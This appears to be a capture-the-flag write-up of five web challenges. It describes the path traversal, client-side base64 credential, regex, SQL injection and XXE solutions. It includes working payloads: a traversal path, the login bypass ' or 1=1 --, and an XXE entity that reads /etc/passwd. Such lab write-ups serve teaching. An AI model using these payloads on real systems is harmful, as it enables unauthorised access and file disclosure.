Medium

Problem	Difficulty
Forbidden paths	Medium
Login	Medium
Matchtheregex	Medium
More sqli	Medium
Soap	Medium

1

Forbidden Paths

Description

Can you get the flag?We know that the website files live in /usr/share/nginx/html/ and the flag is at /flag.txt but the website is filtering absolute file paths. Can you get past the filter to read the flag?Here's the website.

seems like it was a page to read files so knowing that my mind was telling me what if we could do path traversal so i tried reading ../../../../../flag.txt

easy solve 😄

2

Login

When enumerating the page source i found something interesting

(async()=>{await new Promise((e=>window.addEventListener("load",e))),document.querySelector("form").addEventListener("submit",(e=>{e.preventDefault();
const r={u:"input[name=username]",p:"input[name=password]"},t={};
for(const e in r)
t[e]=btoa(document.querySelector(r[e]).value).replace(/=/g,"");
return"YWRtaW4"!==t.u?alert("Incorrect Username"):
"cGljb0NURns1M3J2M3JfNTNydjNyXzUzcnYzcl81M3J2M3JfNTNydjNyfQ"!==t.p?alert("Incorrect Password"):
void alert(`Correct Password! Your flag is ${atob(t.p)}.`)}))})();

you can see that it checks if the username is YWRtaW4in base64 it translates to admin

after we gain the username and password we can login and get the flag 👍

3

Match the regex

after enumerating the page source code

we found a function that just so happens to have a suspicious comment im pretty sure that means we can submit anything that starts with p and has any element per dot then ends with F

easily solved 😄

4

More sqli

when i try to login with random creds

the website actually shows the sql query that it did so this challenge becomes very easy!

we can just use

' or 1=1 --

to bypass the login

the challenge is not over yet!

we got another website now where could that flag be 🤔

anything familiar?

yup we solved the challenged very easily 😎

5

Soap

while casually playing around with the website i found something interesting

the website seems to use xml after studying about xml i suspected that the website might be vulnerable to XXE injection

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
  <ID>&xxe;</ID>
</data>

Solved the challenge easily again 😆